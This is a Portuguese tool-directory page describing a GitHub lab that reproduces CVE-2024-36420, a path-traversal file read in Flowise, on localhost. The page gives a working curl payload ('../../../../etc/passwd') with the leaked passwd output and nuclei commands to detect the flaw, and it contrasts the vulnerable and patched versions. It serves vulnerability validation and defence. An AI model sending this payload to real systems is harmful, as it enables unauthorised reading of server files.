Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC_CVE-2024-36420 — Laboratório de reprodução local e template Nuclei para CVE-2024-36420, uma vulnerabilidade de leitura arbitrária de arquivos no Flowise através do parâmetro fileName não sanitizado. Valida o comportamento vulnerável (1.4.3) e corrigido (3.1.2). | Kitploit
Ferramentas/GitHubGitHub/fineman999/poc_cve-2024-36420
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebFuzzingAprendizado e EducaçãoLabs e Prática
GitHubfineman999/poc_cve-2024-36420

POC_CVE-2024-36420

Laboratório de reprodução local e template Nuclei para CVE-2024-36420, uma vulnerabilidade de leitura arbitrária de arquivos no Flowise através do parâmetro fileName não sanitizado. Valida o comportamento vulnerável (1.4.3) e corrigido (3.1.2).

Ver Repositório
1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

POC_CVE-2024-36420

Laboratório de reprodução local e rascunho de template nuclei para CVE-2024-36420 que afeta o Flowise.

Resumo

CVE-2024-36420 é uma leitura arbitrária de arquivos no Flowise causada pelo uso não sanitizado do parâmetro fileName no corpo da requisição em:

  • POST /api/v1/openai-assistants-file

Este laboratório foi utilizado para validar:

  • comportamento vulnerável em flowiseai/flowise:1.4.3
  • comportamento negado na versão mais nova flowiseai/flowise:3.1.2

Referências

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab:
https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

Arquivos

  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

Teste Vulnerável

Inicie o Flowise 1.4.3:

root@kitploit:~
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

Verificação manual:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Resposta vulnerável observada:

root@kitploit:~
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

Controle de Versão Mais Nova

Inicie o Flowise mais novo 3.1.2:

root@kitploit:~
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

Verificação manual:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

Resposta da versão mais nova observada:

root@kitploit:~
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

Valide o template:

root@kitploit:~
nuclei -duc -validate -t CVE-2024-36420.yaml

Execute contra o alvo vulnerável:

root@kitploit:~
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

Comportamento esperado:

  • 1.4.3: correspondência
  • 3.1.2: sem correspondência

Notas

  • A diferença de versão é aceitável porque este repositório apenas relata o comportamento observado:
    • vulnerável em 1.4.3
    • negado em 3.1.2
  • Ele não afirma o limite exato da versão corrigida.
  • Nenhum alvo real foi utilizado.
Baixar ferramenta